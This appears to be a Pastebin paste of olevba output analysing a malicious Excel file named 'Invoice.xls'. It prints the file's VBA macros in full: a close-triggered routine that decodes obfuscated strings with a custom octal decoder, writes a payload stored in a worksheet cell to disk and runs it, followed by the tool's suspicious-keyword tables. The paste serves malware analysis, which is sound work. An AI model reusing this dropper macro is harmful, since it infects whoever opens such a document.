Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:M-S---- Invoice.xls
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: Invoice.xls
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ÝòàÊíèãà.cls
- in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub Workbook_BeforeClose(Cancel As Boolean)
- hjgHGjkdg
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò1.cls
- in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò2.cls
- in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò3.cls
- in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub hjgHGjkdg()
- Dim PathToSave
- PathToSave = DecryptEPI("-exxhe|e-†“–kjj—£’8¦Ž£")
- Dim WshShell
- Set WshShell = CreateObject(DecryptEPI("{¢— ¤8{–‘šš"))
- PathToSave = WshShell.ExpandEnvironmentStrings(PathToSave)
- Set s = CreateObject(DecryptEPI("ehuhf8{¤¢‘›"))
- s.Mode = 3
- s.Type = 2
- s.Open
- s.WriteText Worksheets(DecryptEPI("’™")).Range(DecryptEPI("h><")).Value
- Call s.SaveToFile(PathToSave, 2)
- WshShell.Run PathToSave
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | WriteText | May create a text file |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Open | May open a file |
- | Suspicious | Run | May run an executable file or a system |
- | | | command |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function DecryptEPI(sString As String) As String
- Dim I As Integer
- Dim sLen As Integer, sBuffer As String
- sLen = Len(sString)
- For I = 1 To sLen
- sBuffer = sBuffer & Chr(Oct2Dec(Asc(Mid(sString, I, 1))))
- Next I
- DecryptEPI = sBuffer
- End Function
- Private Function Oct2Dec(Number As String) As Integer
- Dim I As Integer
- Dim sLen As String, sBuffer As Integer, iNumb As Integer
- sLen = Len(Number)
- For I = 0 To sLen
- iNumb = Val(Mid(StrReverse(Number), I + 1, 1))
- sBuffer = sBuffer + ((8 ^ I) * iNumb)
- Next I
- Oct2Dec = sBuffer
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+------------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | StrReverse | May attempt to obfuscate specific |
- | | | strings |
- +------------+------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement